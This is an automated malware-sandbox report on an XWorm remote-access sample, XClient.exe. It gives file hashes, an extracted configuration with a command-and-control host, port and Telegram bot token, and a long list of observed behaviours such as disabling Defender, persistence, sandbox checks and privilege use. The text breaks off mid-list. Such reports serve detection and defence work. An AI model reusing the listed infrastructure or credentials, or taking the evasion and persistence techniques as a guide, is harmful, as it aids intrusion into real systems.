Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
600s -
max time network
606s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
26/04/2024, 06:25 UTC
General
-
Target
XClient.exe
-
Size
74KB
-
MD5
ef36a6fed3a555b4aee8288dbe0143ee
-
SHA1
b31be44e9e4767d7df123d742f32802aa343d0ec
-
SHA256
4ab06ce2922222f591b776a0c6c332952ff24bbcf6f757692a6ed5f9b45cc67a
-
SHA512
04d87228b20401ab5c7d36be3a217c09a413c671a28c016fa82fe5b19cf7b5579f15bf74212bd6a5fd141bb4e29897dc754bda20896323f8f60fc55a3e47a09c
-
SSDEEP
1536:JztsRxq5z5siBUx5bW1Y9JeaSlbaeQ5FPlREgs6aDOUgyoNFffxv0:dtsRxE5sMiWG96bap9EgEDOUeNFfx0
Malware Config
Extracted
xworm
phentermine-partial.gl.at.ply.gg:36969
-
Install_directory
%AppData%
-
install_file
Client.exe
-
telegram
https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/3384-636-0x000000001B700000-0x000000001B70E000-memory.dmp disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/3384-0-0x0000000000040000-0x0000000000058000-memory.dmp family_xworm behavioral1/files/0x000900000001abb6-214.dat family_xworm -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation XClient.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk XClient.exe -
Executes dropped EXE 10 IoCs
pid Process 4052 Client.exe 2172 Client.exe 4020 Client.exe 1768 Client.exe 4124 Client.exe 2452 Client.exe 1048 Client.exe 308 Client.exe 168 Client.exe 4928 Client.exe -
Loads dropped DLL 1 IoCs
pid Process 3384 XClient.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri taskmgr.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier XClient.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5008 schtasks.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate XClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName XClient.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133585865263509417" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 701530606fadda01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "420894618" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\NextPromptBuild = "15063" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d1060049a397da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "420878014" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 0100000056d498fec0f9c41998f571f243be864efe2fe519d476232345cecb66f3435959de6e0d762b4a0b7c46a4326ab3863b4c54e0b8f9f7534a31bfff MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c895725da397da01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer MicrosoftEdgeCP.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1884 powershell.exe 1884 powershell.exe 1884 powershell.exe 4384 powershell.exe 4384 powershell.exe 3320 taskmgr.exe 3320 taskmgr.exe 4384 powershell.exe 3320 taskmgr.exe 4104 powershell.exe 4104 powershell.exe 3320 taskmgr.exe 4104 powershell.exe 3320 taskmgr.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3384 XClient.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3320 taskmgr.exe -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 1392 chrome.exe 1392 chrome.exe 1392 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3384 XClient.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeIncreaseQuotaPrivilege 1884 powershell.exe Token: SeSecurityPrivilege 1884 powershell.exe Token: SeTakeOwnershipPrivilege 1884 powershell.exe Token: SeLoadDriverPrivilege 1884 powershell.exe Token: SeSystemProfilePrivilege 1884 powershell.exe Token: SeSystemtimePrivilege 1884 powershell.exe Token: SeProfSingleProcessPrivilege 1884 powershell.exe Token: SeIncBasePriorityPrivilege 1884 powershell.exe Token: SeCreatePagefilePrivilege 1884 powershell.exe Token: SeBackupPrivilege 1884 powershell.exe Token: SeRestorePrivilege 1884 powershell.exe Token: SeShutdownPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe Token: SeSystemEnvironmentPrivilege 1884 powershell.exe Token: SeRemoteShutdownPrivilege 1884 powershell.exe Token: SeUndockPrivilege 1884 powershell.exe Token: SeManageVolumePrivilege 1884 powershell.exe Token: 33 1884 powershell.exe Token: 34 1884 powershell.exe Token: 35 1884 powershell.exe Token: 36 1884 powershell.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeDebugPrivilege 3320 taskmgr.exe Token: SeSystemProfilePrivilege 3320 taskmgr.exe Token: SeCreateGlobalPrivilege 3320 taskmgr.exe Token: SeIncreaseQuotaPrivilege 4384 powershell.exe Token: SeSecurityPrivilege 4384 powershell.exe Token: SeTakeOwnershipPrivilege 4384 powershell.exe Token: SeLoadDriverPrivilege 4384 powershell.exe Token: SeSystemProfilePrivilege 4384 powershell.exe Token: SeSystemtimePrivilege 4384 powershell.exe Token: SeProfSingleProcessPrivilege 4384 powershell.exe Token: SeIncBasePriorityPrivilege 4384 powershell.exe Token: SeCreatePagefilePrivilege 4384 powershell.exe Token: SeBackupPrivilege 4384 powershell.exe Token: SeRestorePrivilege 4384 powershell.exe Token: SeShutdownPrivilege 4384 powershell.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeSystemEnvironmentPrivilege 4384 powershell.exe Token: SeRemoteShutdownPrivilege 4384 powershell.exe Token: SeUndockPrivilege 4384 powershell.exe Token: SeManageVolumePrivilege 4384 powershell.exe Token: 33 4384 powershell.exe Token: 34 4384 powershell.exe Token: 35 4384 powershell.exe Token: 36 4384 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeIncreaseQuotaPrivilege 4104 powershell.exe Token: SeSecurityPrivilege 4104 powershell.exe Token: SeTakeOwnershipPrivilege 4104 powershell.exe Token: SeLoadDriverPrivilege 4104 powershell.exe Token: SeSystemProfilePrivilege 4104 powershell.exe Token: SeSystemtimePrivilege 4104 powershell.exe Token: SeProfSingleProcessPrivilege 4104 powershell.exe Token: 